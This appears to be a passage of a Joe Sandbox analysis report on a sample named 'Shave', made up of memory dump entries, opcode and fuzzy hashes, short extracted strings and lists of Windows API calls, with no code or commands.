                                                                                                                                • Opcode Fuzzy Hash: b6bcf6a8fc5b5cc97763b6c6cf357d7e0955c44ec9f118e41d4415dcd461ad97
                                                                                                                                • Instruction Fuzzy Hash: CAD0A7367081146B4B051A49A4048AE7B5ED7CD7313008126F90987300CE754C5297E0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1581f8d40b198ad092ffdc29827a837afddfccbff5ab2f904b91ca542699dadf
                                                                                                                                • Instruction ID: 086b6eaf83d389d50af5d42478ee7879939c2524082e7c5b48b2a6dbfcc39813
                                                                                                                                • Opcode Fuzzy Hash: 1581f8d40b198ad092ffdc29827a837afddfccbff5ab2f904b91ca542699dadf
                                                                                                                                • Instruction Fuzzy Hash: 43D04235E44109CBCB20DFA8E9948DCBB71EF99322B60506AD929A3661D6345495CF11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 52c650d3b022b3c0abd0faba7ab19023f5ec47832997a4bb502f7f0f80e29eda
                                                                                                                                • Instruction ID: d4d2c4ce82f1c48cea51201760d006d7873f500c2e83bbf84c5db421ef7520c5
                                                                                                                                • Opcode Fuzzy Hash: 52c650d3b022b3c0abd0faba7ab19023f5ec47832997a4bb502f7f0f80e29eda
                                                                                                                                • Instruction Fuzzy Hash: 28D0673AB400189FCB149F98EC809DDFB76FB98221B148116E915A3261C7319965DB60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a7120797d9c67da107896207182f421265ff8d5878378bef0837cca983c4aab3
                                                                                                                                • Instruction ID: 601ce4d576f4fd3b440f49b903ebd361b75ecbcfb1017c58df12813e5a2a71bd
                                                                                                                                • Opcode Fuzzy Hash: a7120797d9c67da107896207182f421265ff8d5878378bef0837cca983c4aab3
                                                                                                                                • Instruction Fuzzy Hash: 1FC012300543084EC589FB65ED45955772FAB802447608530A10B0757FEFB859AB8BD0
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0040509B
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004050AB
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                                                                                • ShowWindow.USER32(00000000), ref: 0040525C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                • String ID: $M$N
                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                • Opcode ID: d51f85f8d95834ec81a3e8aa82d4b0f7780387708cc2f6482410258e2394dffd
                                                                                                                                • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                                                                                • Opcode Fuzzy Hash: d51f85f8d95834ec81a3e8aa82d4b0f7780387708cc2f6482410258e2394dffd
                                                                                                                                • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                                                • API String ID: 0-1947560563
                                                                                                                                • Opcode ID: 0b5b445c2ec7ceb27920d47e790e5c4644b520abb012586a291c54b358a16d5b
                                                                                                                                • Instruction ID: ad8636d5eb61b972b939051e2b673fc010f6104707989f43c96a992c0d904861
                                                                                                                                • Opcode Fuzzy Hash: 0b5b445c2ec7ceb27920d47e790e5c4644b520abb012586a291c54b358a16d5b
                                                                                                                                • Instruction Fuzzy Hash: 1732C074E00218CFEB64CF69C984B9DBBB6BF89304F1081A9D809A7361DB759E85CF10
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNEL32(?,?), ref: 004059D2
                                                                                                                                • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?), ref: 00405A1A
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?), ref: 00405A3D
                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?), ref: 00405A43
                                                                                                                                • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?), ref: 00405A53
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                • String ID: (?z$.$.$\*.*
                                                                                                                                • API String ID: 2035342205-1515725298
                                                                                                                                • Opcode ID: 055fc45d478fb46821b4c1b9f61a2cf5f882e22ca3136cc8209be43affe2ce83
                                                                                                                                • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                                                                                • Opcode Fuzzy Hash: 055fc45d478fb46821b4c1b9f61a2cf5f882e22ca3136cc8209be43affe2ce83
                                                                                                                                • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                                                • API String ID: 0-455001714
                                                                                                                                • Opcode ID: f0ccf4dc6b328621d5fd191addbf1194c8c7ec13f6da863aadc3eba9014d14ca
                                                                                                                                • Instruction ID: f6b493f13b352c862e46fccc97948e896a27228a97829cbbb91f86863f499e10
                                                                                                                                • Opcode Fuzzy Hash: f0ccf4dc6b328621d5fd191addbf1194c8c7ec13f6da863aadc3eba9014d14ca
                                                                                                                                • Instruction Fuzzy Hash: 6F12D1B4E002188FDB58CF69C994BDDBBB2BF89304F2081A9D509A7365DB759E85CF10
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(?,007A4F70,?,00401676,00000000), ref: 004065E5
                                                                                                                                • FindClose.KERNEL32(00000000,?,00401676,00000000), ref: 004065F1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                • String ID: pOz
                                                                                                                                • API String ID: 2295610775-1820424874
                                                                                                                                • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                                                                                • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0o@p$&5
                                                                                                                                • API String ID: 0-808467365
                                                                                                                                • Opcode ID: d270d8682d554ffadb756478953d06f93f37f5ad054f9b1ca531a8e7744cb207
                                                                                                                                • Instruction ID: 2ddeb1f791df10f6471c303e68e36a607aac02dc126b305f6b2a4fb583839d9e
                                                                                                                                • Opcode Fuzzy Hash: d270d8682d554ffadb756478953d06f93f37f5ad054f9b1ca531a8e7744cb207
                                                                                                                                • Instruction Fuzzy Hash: 23B1A574E00218CFDB54DFA9D884A9DBBB2FF89314F2081A9D819AB365DB30AD45CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0o@p$&5
                                                                                                                                • API String ID: 0-808467365
                                                                                                                                • Opcode ID: 05ab4f899f40cd59e890a891adbe98efc1006da3479a4ad080ef231f6b565812
                                                                                                                                • Instruction ID: d02d111af1aa52aa4a663705cfacca507c62e5f78a563dfccd4227271bc1bd55
                                                                                                                                • Opcode Fuzzy Hash: 05ab4f899f40cd59e890a891adbe98efc1006da3479a4ad080ef231f6b565812
                                                                                                                                • Instruction Fuzzy Hash: CF51B874E00608CFDB08DFAAC484ADDBBF2BF89305F248169D419AB365DB31A942CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .5uq
                                                                                                                                • API String ID: 0-910421107
                                                                                                                                • Opcode ID: 80d1b202bb4fc334c78fad1e82af8335f3a1fb6ece953b744ee814f6e64f1d3a
                                                                                                                                • Instruction ID: 0e439ec17c2731f988bab895c7e4eb7662116fa9e94cd6ed713d8274623755c6
                                                                                                                                • Opcode Fuzzy Hash: 80d1b202bb4fc334c78fad1e82af8335f3a1fb6ece953b744ee814f6e64f1d3a
                                                                                                                                • Instruction Fuzzy Hash: 6B529B74A01228CFDB64DF65C990BD9BBB2BB89301F1085EAD809A7355DB349E85CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: fe2b041b7f89f2b4b321a8f1110639fc11da744e71cc5524df674f02fbcf0d14
                                                                                                                                • Instruction ID: 5d28c1d1723899088dd37edd8c6aa61763092f7050d60f472b7cc45f8c58dec4
                                                                                                                                • Opcode Fuzzy Hash: fe2b041b7f89f2b4b321a8f1110639fc11da744e71cc5524df674f02fbcf0d14
                                                                                                                                • Instruction Fuzzy Hash: 93D1B178E00218CFDB54DFA9C994B9DBBB2BF89304F1080A9D909AB355DB346D86CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: c8062f3b35e4f4da6f722782a078edbbd1d2ab21f20ba98533aecf793e2b3111
                                                                                                                                • Instruction ID: 4c08c662bd2a171163556bc2f8730e6de91b15430813f17dbc480fec32260489
                                                                                                                                • Opcode Fuzzy Hash: c8062f3b35e4f4da6f722782a078edbbd1d2ab21f20ba98533aecf793e2b3111
                                                                                                                                • Instruction Fuzzy Hash: 89D1A078E00218CFDB54DFA9C990B9DBBB2BF89300F1080A9D909AB365DB355D96CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: 4d49f2cefff32b2d6c7265ee03dadd69720d11b17add1ebcabd0b4b2b5203f28
                                                                                                                                • Instruction ID: a94ef369e98713066f44b94b7b526a6291090b18d7633e39c41346cb59841fb3
                                                                                                                                • Opcode Fuzzy Hash: 4d49f2cefff32b2d6c7265ee03dadd69720d11b17add1ebcabd0b4b2b5203f28
                                                                                                                                • Instruction Fuzzy Hash: 8BD1A178E00218CFDB54DFA9C990B9DBBB2BF89304F1080A9D809AB355DB355D96CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: 57c0d2c13f036651ae6be8f2d85cbf4eba9a5dba2d42f83cf64308b1bf63f316
                                                                                                                                • Instruction ID: 802dfdf6df7029090623a6bb870da12d74d1ee596eb86ce67943910c4db968a0
                                                                                                                                • Opcode Fuzzy Hash: 57c0d2c13f036651ae6be8f2d85cbf4eba9a5dba2d42f83cf64308b1bf63f316
                                                                                                                                • Instruction Fuzzy Hash: B2D1B078E00218CFDB54DFA9C980B9DBBB6BF89300F1080A9D809AB365DB355D86CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: a685f4c56e93ea7f1187af191d69d7e042fea258ee7b73bed44d0f7ee05c5ea5
                                                                                                                                • Instruction ID: 349b8b637d2f8cb7894f4f36f9cb2733419e10968a048a2af9867885917a813f
                                                                                                                                • Opcode Fuzzy Hash: a685f4c56e93ea7f1187af191d69d7e042fea258ee7b73bed44d0f7ee05c5ea5
                                                                                                                                • Instruction Fuzzy Hash: 20D1A178E00218CFDB54DFA9C990B9DBBB2BF89304F1080A9D909AB355DB356D86CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: 0c1582e63947d7ecb366c368b5165222a91801414f2d29b5bcb97d23f561a240
                                                                                                                                • Instruction ID: 2f73b5a5833c83f6ec1c398ed8790af61b6245857e85f00d7048d147aaf862ef
                                                                                                                                • Opcode Fuzzy Hash: 0c1582e63947d7ecb366c368b5165222a91801414f2d29b5bcb97d23f561a240
                                                                                                                                • Instruction Fuzzy Hash: 6DD1A078E00218CFDB54DFA9C990B9DBBB2BF89300F1080A9D808AB365DB355D96CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: d6809b4957c0b9b4978c7577bf0938675486c274d072ea4047b66c97970c53ed
                                                                                                                                • Instruction ID: fd80bff20ee63802b5f24a0e2e0364207749df3303cb3db448937112df9cf1b3
                                                                                                                                • Opcode Fuzzy Hash: d6809b4957c0b9b4978c7577bf0938675486c274d072ea4047b66c97970c53ed
                                                                                                                                • Instruction Fuzzy Hash: 66D1B274E00218CFDB54DFA9C980B9DBBB2BF89304F1080A9D509AB355DB346D96CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: e61e505d3fd822f973d50decb418285ee8d963da8fc31b6317966b3eb412114c
                                                                                                                                • Instruction ID: 0076bb32ea92871d3a35076dbf62ef6a462e2c0ebb5e8ae9ef87689f5aac66b8
                                                                                                                                • Opcode Fuzzy Hash: e61e505d3fd822f973d50decb418285ee8d963da8fc31b6317966b3eb412114c
                                                                                                                                • Instruction Fuzzy Hash: 7ED1A078E00218CFDB54DFA9C990B9DBBB2BF89304F1080A9D909AB365DB355986CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: 244f920b0dbc776ab4a2ebdaf9b1cfff39e824c951b8fc2f5bd150cefc39b398
                                                                                                                                • Instruction ID: 71c0b1eeba0babe3027472dec383dab60b4a571fa2e9d19a54491707b08d69b6
                                                                                                                                • Opcode Fuzzy Hash: 244f920b0dbc776ab4a2ebdaf9b1cfff39e824c951b8fc2f5bd150cefc39b398
                                                                                                                                • Instruction Fuzzy Hash: F6D1A078E00218CFDB54DFA9C990B9DBBB2BF89304F1080A9D908AB365DB355986CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5
                                                                                                                                • API String ID: 0-2319075445
                                                                                                                                • Opcode ID: 97d310836aa465777cabfe011e71d5194d3f8132580aa6584d05c52ef53345ce
                                                                                                                                • Instruction ID: 35d1ebb93163099767d8b703e35da7fa4d81cf602b6eb5b4ddd4a62eb2612c20
                                                                                                                                • Opcode Fuzzy Hash: 97d310836aa465777cabfe011e71d5194d3f8132580aa6584d05c52ef53345ce
                                                                                                                                • Instruction Fuzzy Hash: 9BD1B078E00218CFDB14DFA9C994B9DBBB2BF89300F1081A9D809AB365DB355986CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6a9afae318ee947b762e368e39f0a80a126a22592ee46e8aac46b8d0d1d4fc27
                                                                                                                                • Instruction ID: edbcc172f93415dadc9caa5efd910d8283f942972bd56d5bf45ff508f7599072
                                                                                                                                • Opcode Fuzzy Hash: 6a9afae318ee947b762e368e39f0a80a126a22592ee46e8aac46b8d0d1d4fc27
                                                                                                                                • Instruction Fuzzy Hash: 6C72BB74E01228CFDB69DF69C990BDDBBB2BB49301F5091EAD409A7351DB34AA81CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5a5d819d54603ab9a22a7db1cdbe820ea7350a43f62286f7a6b4d37a2530d876
                                                                                                                                • Instruction ID: 62ae0f8fc4b92c4aea4ce5391f050819a09b6e68688091a0c371a407d52aa1b8
                                                                                                                                • Opcode Fuzzy Hash: 5a5d819d54603ab9a22a7db1cdbe820ea7350a43f62286f7a6b4d37a2530d876
                                                                                                                                • Instruction Fuzzy Hash: F6D1A274E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ece867e2cee064e3797b6697a0553f61fdb1965d8fe553148f0dc68ac9988c55
                                                                                                                                • Instruction ID: 9c2d8627f2d3e04a50821f56857fa1810b02dc5fcf55f0bc9c7295b9a870342b
                                                                                                                                • Opcode Fuzzy Hash: ece867e2cee064e3797b6697a0553f61fdb1965d8fe553148f0dc68ac9988c55
                                                                                                                                • Instruction Fuzzy Hash: A5D19E74E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E86CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bcdd6b6da4c9a08bf639d517521f21e9dd168061e714a9a846b9c919e6c5686a
                                                                                                                                • Instruction ID: a4cf50da039062792dd90f845c9025a27448a2d87bbb1e6a216fd10112543a49
                                                                                                                                • Opcode Fuzzy Hash: bcdd6b6da4c9a08bf639d517521f21e9dd168061e714a9a846b9c919e6c5686a
                                                                                                                                • Instruction Fuzzy Hash: 1FD19E74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB395DB359E86CF50
